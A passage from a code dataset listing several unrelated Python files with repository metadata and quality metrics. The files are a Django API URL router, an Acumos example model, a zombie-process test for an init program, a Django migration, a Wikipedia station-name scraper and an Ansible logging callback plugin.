| 31.241573 | 156 | 0.517173 | 795 | 5,561 | 3.574843 | 0.226415 | 0.028149 | 0.028501 | 0.025334 | 0.348698 | 0.237861 | 0.167488 | 0.163969 | 0.065447 | 0.040816 | 0 | 0.047188 | 0.264521 | 5,561 | 177 | 157 | 31.418079 | 0.647677 | 0.048013 | 0 | 0.1 | 0 | 0 | 0.124433 | 0.029501 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.026667 | null | null | 0.073333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cfe32d1805ca5c9b99d405aebfbc9ec70014e365 | 1,702 | py | Python | vaultier/vaultier/urls_api.py | dz0ny/Vaultier | e23d86c7576f4785b4e369242d7b5f7125e4d8c6 | [
"BSD-3-Clause"
] | 30 | 2015-07-13T11:11:23.000Z | 2021-01-25T14:21:18.000Z | vaultier/vaultier/urls_api.py | corpusops/vaultier | 3baef4346add0b3bdff322257467f74b2a0c856c | [
"BSD-3-Clause"
] | null | null | null | vaultier/vaultier/urls_api.py | corpusops/vaultier | 3baef4346add0b3bdff322257467f74b2a0c856c | [
"BSD-3-Clause"
] | 31 | 2015-08-10T12:10:16.000Z | 2020-09-18T09:43:28.000Z | from django.conf.urls import patterns, url
from rest_framework import routers
from accounts.api import UserViewSet, LostKeyViewSet, AuthView, MemberViewSet
from nodes.api import NodeViewSet, NodePathView, NodeDataView, PolicyViewSet
from news.api import NewsApiView
from search.api import SearchView
from vaultier.views import ConfigView
# todo: move
from workspaces.api import WorkspaceKeyViewSet, InvitationViewSet
from vaultier.api import ServerTimeView
router = routers.DefaultRouter()
router.register(r'users', UserViewSet, base_name='user')
router.register(r'nodes', NodeViewSet, base_name='node')
router.register(r'workspace_keys', WorkspaceKeyViewSet,
base_name='workspace_key')
router.register(r'members', MemberViewSet, base_name='member')
router.register(r'invitations', InvitationViewSet, base_name='invitation')
router.register(r'roles', PolicyViewSet, base_name='role')
router.register(r'lost_keys', LostKeyViewSet, base_name='lost_keys')
urlpatterns = router.urls
urlpatterns += patterns(
'',
url(r'^config/', ConfigView.as_view(), name='config'),
# node path
url(r'^nodes/(?P<pk>\d+)/path/$', NodePathView.as_view(),
name='node-path'),
# node data
url(r'^nodes/(?P<pk>\d+)/data/$', NodeDataView.as_view(),
name='node-data'),
# server time
url(r'^server-time/$', ServerTimeView.as_view(),
name='server_time'),
# news
url(r'^news/$', NewsApiView.as_view(), name='news-list'),
# search
url(r'^search/search$', SearchView.as_view(), name='search-search'),
# auth
url(r'^auth/auth$', AuthView.as_view(), name='auth-auth'),
url(r'^auth/user$', UserViewSet.as_view(), name='auth-user'),
)
| 37.822222 | 77 | 0.716804 | 216 | 1,702 | 5.550926 | 0.305556 | 0.026689 | 0.066722 | 0.016681 | 0.021685 | 0.021685 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 1,702 | 44 | 78 | 38.681818 | 0.810135 | 0.034665 | 0 | 0 | 0 | 0 | 0.181651 | 0.030581 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cff1acb028a442105c7a88da1c72d65ee9945c3b | 1,416 | py | Python | adapter/acumos/tests/fixtures/models/example-model-listofm/example_model.py | onap/dcaegen2-platform | 9e930892d28fc4a3378fad8f942c9f91cffe4698 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | adapter/acumos/tests/fixtures/models/example-model-listofm/example_model.py | onap/dcaegen2-platform | 9e930892d28fc4a3378fad8f942c9f91cffe4698 | [
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null | adapter/acumos/tests/fixtures/models/example-model-listofm/example_model.py | onap/dcaegen2-platform | 9e930892d28fc4a3378fad8f942c9f91cffe4698 | [
"Apache-2.0",
"CC-BY-4.0"
] | 1 | 2021-10-15T15:02:20.000Z | 2021-10-15T15:02:20.000Z | # ============LICENSE_START====================================================
# org.onap.dcae
# =============================================================================
# Copyright (c) 2019 AT&T Intellectual Property. All rights reserved.
# =============================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END======================================================
from acumos.session import AcumosSession
from acumos.modeling import Model, List, NamedTuple
class Args(NamedTuple):
x: int
y: int
class ArgsList(NamedTuple):
args: List[Args]
def sum(args: ArgsList) -> List[int]:
return [arg.x + arg.y for arg in args]
if __name__ == '__main__':
'''Main'''
model = Model(sum=sum)
session = AcumosSession()
session.dump(model, 'example-model', '.')
| 33.714286 | 80 | 0.552966 | 158 | 1,416 | 4.892405 | 0.607595 | 0.07762 | 0.033635 | 0.041397 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006826 | 0.172316 | 1,416 | 41 | 81 | 34.536585 | 0.65273 | 0.646893 | 0 | 0 | 0 | 0 | 0.051044 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0.076923 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
cff604b05a37b829ebc45bdab750338b3e114a56 | 410 | py | Python | test-grandchild-zombie.py | tsaarni/11th-init | 32e28cfafbd8c12a1dc369dae54bce13a7c819e4 | [
"Apache-2.0"
] | null | null | null | test-grandchild-zombie.py | tsaarni/11th-init | 32e28cfafbd8c12a1dc369dae54bce13a7c819e4 | [
"Apache-2.0"
] | null | null | null | test-grandchild-zombie.py | tsaarni/11th-init | 32e28cfafbd8c12a1dc369dae54bce13a7c819e4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env -S python3 -u
import os
import time
pid = os.fork()
if pid != 0:
print("Child pid={}".format(pid))
time.sleep(999999)
else:
time.sleep(1)
# child forks grandchild and exits
pid2 = os.fork()
if pid2 != 0:
print("Grandchild pid={}".format(pid2))
time.sleep(5)
print("Child exits and grandchild becomes zombie")
else:
# grandchild exits and becomes zombie
pass
| 19.52381 | 54 | 0.646341 | 61 | 410 | 4.344262 | 0.47541 | 0.101887 | 0.060377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043344 | 0.212195 | 410 | 20 | 55 | 20.5 | 0.77709 | 0.236585 | 0 | 0.133333 | 0 | 0 | 0.225806 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.133333 | 0 | 0.133333 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cff6ef64731c31c3337a745a26d8620d5ecfffab | 1,024 | py | Python | HuberyBlog/extra_apps/django_comments/migrations/0004_auto_20190130_1520.py | SomnambulistOfChina/ChineseSomnambulist | dc6efcb4ea1bc02f8999cd78bebfd648253631a6 | [
"Apache-2.0"
] | 5 | 2019-05-21T08:26:18.000Z | 2021-07-20T11:32:49.000Z | HuberyBlog/extra_apps/django_comments/migrations/0004_auto_20190130_1520.py | SomnambulistOfChina/ChineseSomnambulist | dc6efcb4ea1bc02f8999cd78bebfd648253631a6 | [
"Apache-2.0"
] | null | null | null | HuberyBlog/extra_apps/django_comments/migrations/0004_auto_20190130_1520.py | SomnambulistOfChina/ChineseSomnambulist | dc6efcb4ea1bc02f8999cd78bebfd648253631a6 | [
"Apache-2.0"
] | 2 | 2019-07-20T08:35:04.000Z | 2020-02-29T07:34:42.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2019-01-30 15:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_comments', '0003_add_submit_date_index'),
]
operations = [
migrations.AlterModelOptions(
name='comment',
options={'ordering': ('submit_date',), 'permissions': [('can_moderate', 'Can moderate comments')], 'verbose_name': '评论', 'verbose_name_plural': '评论'},
),
migrations.AddField(
model_name='comment',
name='replay_name',
field=models.CharField(blank=True, max_length=50),
),
migrations.AddField(
model_name='comment',
name='replay_to',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='comment',
name='root_id',
field=models.IntegerField(default=0),
),
]
| 29.257143 | 162 | 0.584961 | 102 | 1,024 | 5.656863 | 0.588235 | 0.076257 | 0.119584 | 0.140381 | 0.325823 | 0.218371 | 0.152513 | 0 | 0 | 0 | 0 | 0.034014 | 0.282227 | 1,024 | 34 | 163 | 30.117647 | 0.75102 | 0.066406 | 0 | 0.444444 | 1 | 0 | 0.203568 | 0.027282 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cff7b4aaadc6503b4d3c0b54bed2cfd5a237b248 | 1,489 | py | Python | inputs/stations/extract_china_station_raw.py | bearlin/tool_get_famous_scenery_station_airport_and_their_scws_tokens | 210adf69118065e01d7ae50e57b7c773a1a1bd65 | [
"MIT"
] | null | null | null | inputs/stations/extract_china_station_raw.py | bearlin/tool_get_famous_scenery_station_airport_and_their_scws_tokens | 210adf69118065e01d7ae50e57b7c773a1a1bd65 | [
"MIT"
] | null | null | null | inputs/stations/extract_china_station_raw.py | bearlin/tool_get_famous_scenery_station_airport_and_their_scws_tokens | 210adf69118065e01d7ae50e57b7c773a1a1bd65 | [
"MIT"
] | null | null | null | #!/usr/bin/python
from sys import argv
import re
import codecs
print "Start."
script, filename = argv
print "script: %r." % script
print "filename: %r." % filename
print "Opening the rawfile..."
rawfile = codecs.open(filename, 'r', encoding='utf-8')
dumpfile = codecs.open(filename + ".dump", 'w', encoding='utf-8')
# Feed the rawfile into findall(); it returns a list of all the found strings
pattern = re.compile("<li><a\ href=\"/wiki/[^U].*title=\".*</a></li>")
strings = re.findall(pattern, rawfile.read())
print "%r" % (strings)
# Processing matched strings
lineCount=0
for string in strings:
lineCount = lineCount + 1
print "Processing[%d]:%s" % (lineCount, string)
strtmp1 = string.rstrip('</a></li>').lstrip()
#print "after strip end:%s" % (strtmp1)
keyIdx = strtmp1.index('title=\"')
startIdx = keyIdx + 7
endIdx = len(strtmp1)
#print "keyIdx:%r" % (keyIdx)
#print "startIdx:%r" % (startIdx)
#print "endIdx:%r" % (endIdx)
strtmp2 = strtmp1[startIdx:endIdx]
keyIdx = strtmp2.index('>')
startIdx = keyIdx + 1
endIdx = len(strtmp2)
#print "keyIdx:%r" % (keyIdx)
#print "startIdx:%r" % (startIdx)
#print "endIdx:%r" % (endIdx)
strtmp3 = strtmp2[startIdx:endIdx]
strtmp4 = strtmp3.lstrip().rstrip() # strip white space characters
if strtmp4 == '':
continue
print "After stripped:%s" % (strtmp4)
# Write stripped result to dumpfile
dumpfile.write(strtmp4)
dumpfile.write("\n")
dumpfile.close()
rawfile.close()
print "Done."
| 26.122807 | 77 | 0.661518 | 193 | 1,489 | 5.103627 | 0.414508 | 0.018274 | 0.036548 | 0.036548 | 0.117767 | 0.117767 | 0.117767 | 0.117767 | 0.117767 | 0.117767 | 0 | 0.016813 | 0.161182 | 1,489 | 56 | 78 | 26.589286 | 0.771817 | 0.26595 | 0 | 0 | 0 | 0 | 0.143386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.085714 | null | null | 0.228571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cffe84fc8998209b2c270a0a862cd75d59cdea30 | 19,967 | py | Python | APMSSO_Ansible/plugins/callback/apmsso_callback_log.py | CA-APM/infra-agent-automation | 172bc08ba9d911e904f1bf61bd7e5a6cecbc58b1 | [
"Apache-2.0"
] | null | null | null | APMSSO_Ansible/plugins/callback/apmsso_callback_log.py | CA-APM/infra-agent-automation | 172bc08ba9d911e904f1bf61bd7e5a6cecbc58b1 | [
"Apache-2.0"
] | null | null | null | APMSSO_Ansible/plugins/callback/apmsso_callback_log.py | CA-APM/infra-agent-automation | 172bc08ba9d911e904f1bf61bd7e5a6cecbc58b1 | [
"Apache-2.0"
] | 1 | 2020-10-27T11:21:47.000Z | 2020-10-27T11:21:47.000Z | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
callback: default
type: stdout
short_description: Ansible Screen Output and Create log file
version_added: historical
description:
- This is the CA apmia output callback for ansible-playbook.
extends_documentation_fragment:
- default_callback
requirements:
- set as stdout in configuration
'''
from ansible import constants as C
from ansible.playbook.task_include import TaskInclude
from ansible.plugins.callback import CallbackBase
from ansible.utils.color import colorize, hostcolor
from datetime import datetime
import os
import re
import sys
import thread
import time
import multiprocessing
import threading
import os.path
import string
class CallbackModule(CallbackBase):
'''
This is the default callback interface, which simply prints messages
to stdout when new callback events are received.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'apmsso_callback_log'
global print_star
global f
global fil
global host_list
host_list = []
f = open('apmsso_ansible.log', "a")
if os.path.exists('temp_abc') == True:
os.remove('temp_abc')
if os.path.exists('report.log') == True:
os.remove('report.log')
if os.path.exists('comment_temp') == True:
os.remove('comment_temp')
if os.path.exists('msg_temp') == True:
os.remove('msg_temp')
def __init__(self):
self._play = None
super(CallbackModule, self).__init__()
def print_star(msg):
sys.stdout.write("\033[K")
while True:
sys.stdout.flush()
print("......", end='')
time.sleep(0.5)
if msg != "stop":
break
print(end="\r")
sys.stdout.write("\033[K")
def v2_runner_on_failed(self, command_result, ignore_errors=False):
fil = open('temp_abc', "a")
t1 = threading.Thread(target=print_star, args=("start",))
t1.start()
dele_variables = command_result._result.get('_ansible_dele_variables', None)
if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
self._print_task_banner(command_result._task)
self._handle_exception(command_result._result)
self._handle_warnings(command_result._result)
if command_result._task.loop and 'results' in command_result._result:
self._process_items(command_result)
else:
if dele_variables:
f.writelines("%s-----fatal: [%s -> %s]: FAILED! => %s\n" % (datetime.now(), command_result._host.get_name(), dele_variables['ansible_host'], self._dump_results(command_result._result)))
else:
f.writelines("%s-----fatal: [%s]: FAILED! => %s\n" % (datetime.now(), command_result._host.get_name(), self._dump_results(command_result._result)))
fil.writelines("\n%s Fail %s" % (command_result._host.get_name(), self._dump_results(command_result._result)))
fil.close()
if ignore_errors:
self._display.display("...ignoring", color=C.COLOR_SKIP)
f.writelines("%s-----...ignoring\n" % (datetime.now()))
t1 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_on_ok(self, command_result):
t2 = threading.Thread(target=print_star, args=("start",))
t2.start()
dele_variables = command_result._result.get('_ansible_dele_variables', None)
if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
self._print_task_banner(command_result._task)
if isinstance(command_result._task, TaskInclude):
return
elif command_result._result.get('changed', False):
if dele_variables:
msg = "changed: [%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
msg1 = ""
else:
msg = "changed: [%s]" % command_result._host.get_name()
msg1 = ""
color = C.COLOR_CHANGED
else:
if dele_variables:
msg = "ok: [%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
msg1=""
else:
msg = "ok: [%s]" % command_result._host.get_name()
msg1=""
color = C.COLOR_OK
self._handle_warnings(command_result._result)
if command_result._task.loop and 'results' in command_result._result:
self._process_items(command_result)
else:
if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
if command_result._task.action == 'debug' and 'changed' in command_result._result:
del command_result._result['changed']
msg += " => %s" % (self._dump_results(command_result._result),)
msg1 = "%s" % (self._dump_results(command_result._result),)
if msg1 != "":
self._display.display(msg1, color=color)
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t2 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_on_skipped(self, command_result):
t3 = threading.Thread(target=print_star, args=("start",))
t3.start()
if self._plugin_options.get('show_skipped_hosts', C.DISPLAY_SKIPPED_HOSTS): # fallback on constants for inherited plugins missing docs
if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
self._print_task_banner(command_result._task)
if command_result._task.loop and 'results' in command_result._result:
self._process_items(command_result)
else:
msg = "skipping: [%s]" % command_result._host.get_name()
if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
msg += " => %s" % self._dump_results(command_result._result)
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t3 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_on_unreachable(self, command_result):
fil = open('temp_abc', "a")
t4 = threading.Thread(target=print_star, args=("start",))
t4.start()
if self._play.strategy == 'free' and self._last_task_banner != command_result._task._uuid:
self._print_task_banner(command_result._task)
dele_variables = command_result._result.get('_ansible_dele_variables', None)
if dele_variables:
f.writelines("fatal: [%s -> %s]: UNREACHABLE! => %s\n" % (command_result._host.get_name(), dele_variables['ansible_host'], self._dump_results(command_result._result)))
else:
f.writelines("fatal: [%s]: UNREACHABLE! => %s\n" % (command_result._host.get_name(), self._dump_results(command_result._result)))
fil.writelines("\n%s Unreach %s" % (command_result._host.get_name(), self._dump_results(command_result._result)))
fil.close()
t4 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_no_hosts_matched(self):
t5 = threading.Thread(target=print_star, args=("start",))
t5.start()
self._display.display("skipping: no hosts matched", color=C.COLOR_SKIP)
f.writelines("%s-----skipping: no hosts matched\n" % (datetime.now()))
t5 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_no_hosts_remaining(self):
t6 = threading.Thread(target=print_star, args=("start",))
t6.start()
f.writelines("%s-----NO MORE HOSTS LEFT\n" % (datetime.now()))
t6 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_task_start(self, task, is_conditional):
t7 = threading.Thread(target=print_star, args=("start",))
t7.start()
if self._play.strategy != 'free':
f.writelines("%s-----%s\n" % (datetime.now(), task))
t7 = threading.Thread(target=print_star, args=("stop",))
def _print_task_banner(self, task):
t8 = threading.Thread(target=print_star, args=("start",))
t8.start()
args = ''
if not task.no_log and C.DISPLAY_ARGS_TO_STDOUT:
args = u', '.join(u'%s=%s' % a for a in task.args.items())
args = u' %s' % args
f.writelines(u"%s-----TASK [%s%s]\n" % (datetime.now(), task.get_name().strip(), args))
if self._display.verbosity >= 2:
path = task.get_path()
if path:
f.writelines(u"%s-----task path: %s\n" % (datetime.now(), path))
self._last_task_banner = task._uuid
t8 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_cleanup_task_start(self, task):
t9 = threading.Thread(target=print_star, args=("start",))
t9.start()
f.writelines("%s-----CLEANUP TASK [%s]\n" % (datetime.now(), task.get_name().strip()))
t9 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_handler_task_start(self, task):
t10 = threading.Thread(target=print_star, args=("start",))
t10.start()
f.writelines("%s-----RUNNING HANDLER [%s]\n" % task.get_name().strip())
t10 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_play_start(self, play):
t11 = threading.Thread(target=print_star, args=("start",))
t11.start()
name = play.get_name().strip()
if not name:
msg = u"PLAY"
else:
msg = u"PLAY [%s]" % name
self._play = play
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t11 = threading.Thread(target=print_star, args=("stop",))
def v2_on_file_diff(self, command_result):
t12 = threading.Thread(target=print_star, args=("start",))
t12.start()
if command_result._task.loop and 'results' in command_result._result:
for res in command_result._result['results']:
if 'diff' in res and res['diff'] and res.get('changed', False):
diff = self._get_diff(res['diff'])
if diff:
f.writelines("%s-----%s\n" % (datetime.now(), diff))
elif 'diff' in command_result._result and command_result._result['diff'] and command_result._result.get('changed', False):
diff = self._get_diff(command_result._result['diff'])
if diff:
f.writelines("%s-----%s\n" % (datetime.now(), diff))
t12 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_item_on_ok(self, command_result):
t13 = threading.Thread(target=print_star, args=("start",))
t13.start()
dele_variables = command_result._result.get('_ansible_dele_variables', None)
if isinstance(command_result._task, TaskInclude):
return
elif command_result._result.get('changed', False):
msg = 'changed'
color = C.COLOR_CHANGED
else:
msg = 'ok'
color = C.COLOR_OK
if dele_variables:
msg += ": [%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
else:
msg += ": [%s]" % command_result._host.get_name()
msg += " => (item=%s)" % (self._get_item(command_result._result),)
if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
msg += " => %s" % self._dump_results(command_result._result)
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t13 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_item_on_failed(self, command_result):
t14 = threading.Thread(target=print_star, args=("start",))
t14.start()
dele_variables = command_result._result.get('_ansible_dele_variables', None)
self._handle_exception(command_result._result)
msg = "failed: "
if dele_variables:
msg += "[%s -> %s]" % (command_result._host.get_name(), dele_variables['ansible_host'])
else:
msg += "[%s]" % (command_result._host.get_name())
self._handle_warnings(command_result._result)
f.writelines("%s-----%s (item=%s) => %s\n" % (datetime.now(), msg, self._get_item(command_result._result), self._dump_results(command_result._result)))
t14 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_item_on_skipped(self, command_result):
t15 = threading.Thread(target=print_star, args=("start",))
t15.start()
if self._plugin_options.get('show_skipped_hosts', C.DISPLAY_SKIPPED_HOSTS): # fallback on constants for inherited plugins missing docs
msg = "skipping: [%s] => (item=%s) " % (command_result._host.get_name(), self._get_item(command_result._result))
if (self._display.verbosity > 0 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
msg += " => %s" % self._dump_results(command_result._result)
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t15 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_include(self, included_file):
t16 = threading.Thread(target=print_star, args=("start",))
t16.start()
msg = 'included: %s for %s' % (included_file._filename, ", ".join([h.name for h in included_file._hosts]))
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t16 = threading.Thread(target=print_star, args=("stop",))
def v2_playbook_on_stats(self, stats):
max_length = []
hn = ""
cn = ""
st = ""
outp = ""
mt = []
change_host_list = []
#########################################################################################################################
if os.path.exists('msg_temp') == True:
mt1=open('msg_temp')
max_length_line = len(max(open('msg_temp', 'r'), key=len))
if max_length_line+10 >= 168:
max_length_line = 158
for line in mt1:
mt.append(line.split(None, 1))
if len(mt) != 0:
for itm in range(len(mt)):
change_host_list.append(mt[itm][0])
change_host_list = set(change_host_list)
print("\n")
f.writelines("%s\n" % (datetime.now()))
for i in range(max_length_line+10):
print("\033[34m-\033[0m", end = '')
f.write("-")
print("\033[36m\nConfiguration Changed in Each Host\033[0m")
f.writelines("\nConfiguration Changed in Each Host\n")
for i in range(max_length_line+10):
print("\033[34m-\033[0m", end = '')
f.write("-")
for itm in change_host_list:
print("\n\033[1;36m%s\033[0m" % (itm))
f.writelines("\n%s" % (itm))
for itms in range(len(mt)):
if mt[itms][0] == itm:
print("\t\033[1;36m*\033[0m \033[93m%s\033[0m " % (mt[itms][1]))
f.writelines("\n\t* %s" % (mt[itms][1]))
for i in range(max_length_line+10):
print("\033[34m-\033[0m", end = '')
f.write("-")
print("\n")
f.writelines("\n")
mt1.close()
#########################################################################################################################
command_temp="NA"
if os.path.exists('comment_temp') == True:
ct = open('comment_temp')
for line in ct:
command_temp = line
os.remove('comment_temp')
if os.path.exists('report.log') == True:
rf = open('report.log')
for line in rf:
if len(line.strip()) == 0:
pass
else:
host_list.append(line.split(None, 3))
if os.path.exists('temp_abc') == True:
fii = open('temp_abc', "r")
for line in fii:
if len(line.strip()) == 0:
pass
else:
str1, str2, str3 = line.split(None, 2)
if str2 == "Unreach":
stri = str1 + " " + command_temp + " " + str2 + " Host is Unreachable."
else:
stri = str1 + " " + command_temp + " " + str2 + " " + str3
host_list.append(stri.split(None, 3))
if os.path.exists('report.log') == True:
max_length_line = len(max(open('report.log', 'r'), key=len).strip())
elif os.path.exists('temp_abc') == True:
max_length_line = len(max(open('temp_abc', 'r'), key=len).strip())
if len(host_list) != 0:
if max_length_line+40 >= 168:
max_length_line =128
print("\n")
for i in range(max_length_line+40):
print("\033[34m-\033[0m", end = '')
print("\033[36m\nOutput of Ansible Command\033[0m")
for i in range(max_length_line+40):
print("\033[34m-\033[0m", end ='')
print("\n\033[1;36mHost Name\033[0m\t\t\t\033[34m|\033[0m\t\033[1;36mEnvironoment\033[0m\t\033[34m|\033[0m\033[1;36mStatus\033[0m\033[34m|\033[0m \033[1;36mOutput\033[0m")
for line in range(len(host_list)):
hn,cn,st,outp = host_list[line]
outp = outp.replace("\\t"," ")
outp = outp.replace("\\n",",")
outp = outp.replace("\\r"," ")
outp = outp.replace("\"","")
outp = outp.replace("\\\\","\\")
outp = re.sub(r'[\n]', ' ', outp)
outp = re.sub(' +', ' ', outp)
for i in range(max_length_line+40):
print("\033[34m-\033[0m", end='')
if st.strip() == "Unreach" or st.strip() == "Fail":
print("\n\033[2;93m%s\033[0m\t\t\t\033[34m|\033[0m\t\033[93m%s\033[0m\t\033[34m|\033[0m \033[31m%s\033[0m \033[34m|\033[0m \033[93m%s\033[0m" % ( hn.center(10), cn.center(10), st.center(10).strip(), outp.center(10)))
else:
print("\n\033[2;93m%s\033[0m\t\t\t\033[34m|\033[0m\t\033[93m%s\033[0m\t\033[34m|\033[0m \033[32m%s\033[0m \033[34m|\033[0m \033[93m%s\033[0m" % ( hn.center(10), cn.center(10), st.center(10).strip(), outp.center(10)))
for i in range(max_length_line+40):
print("\033[34m-\033[0m", end ='')
print("\n")
if os.path.exists('temp_abc') == True:
os.remove('temp_abc')
if os.path.exists('report.log') == True:
os.remove('report.log')
if os.path.exists('msg_temp') == True:
os.remove('msg_temp')
def v2_playbook_on_start(self, playbook):
t17 = threading.Thread(target=print_star, args=("start",))
t17.start()
if self._display.verbosity > 1:
from os.path import basename
f.writelines("%s-----PLAYBOOK: %s\n" % (datetime.now(), basename(playbook._file_name)))
if self._display.verbosity > 3:
if self._options is not None:
for option in dir(self._options):
if option.startswith('_') or option in ['read_file', 'ensure_value', 'read_module']:
continue
val = getattr(self._options, option)
if val:
self._display.vvvv('%s: %s' % (option, val))
t17 = threading.Thread(target=print_star, args=("stop",))
def v2_runner_retry(self, command_result):
t18 = threading.Thread(target=print_star, args=("",))
t18.start()
task_name = command_result.task_name or command_result._task
msg = "FAILED - RETRYING: %s (%d retries left)." % (task_name, command_result._result['retries'] - command_result._result['attempts'])
if (self._display.verbosity > 2 or '_ansible_verbose_always' in command_result._result) and '_ansible_verbose_override' not in command_result._result:
msg += "Result was: %s" % self._dump_results(command_result._result)
f.writelines("%s-----%s\n" % (datetime.now(), msg))
t18 = threading.Thread(target=print_star, args=("stop",))
| 44.272727 | 227 | 0.609355 | 2,636 | 19,967 | 4.379742 | 0.115706 | 0.108099 | 0.083932 | 0.081074 | 0.666869 | 0.617843 | 0.592724 | 0.477956 | 0.4479 | 0.44175 | 0 | 0.033117 | 0.221165 | 19,967 | 450 | 228 | 44.371111 | 0.709279 | 0.014324 | 0 | 0.338462 | 0 | 0.012821 | 0.163557 | 0.038039 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.005128 | 0.041026 | null | null | 0.164103 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
32057b2f2625521defc8d8e72d5b52ef1fd8a76a | 464 | py | Python | validator/setup.py | acmiyaguchi/mozschema-validator | 04d265bb9359107580f8726bce5102b14a68f156 | [
"MIT"
] | null | null | null | validator/setup.py | acmiyaguchi/mozschema-validator | 04d265bb9359107580f8726bce5102b14a68f156 | [
"MIT"
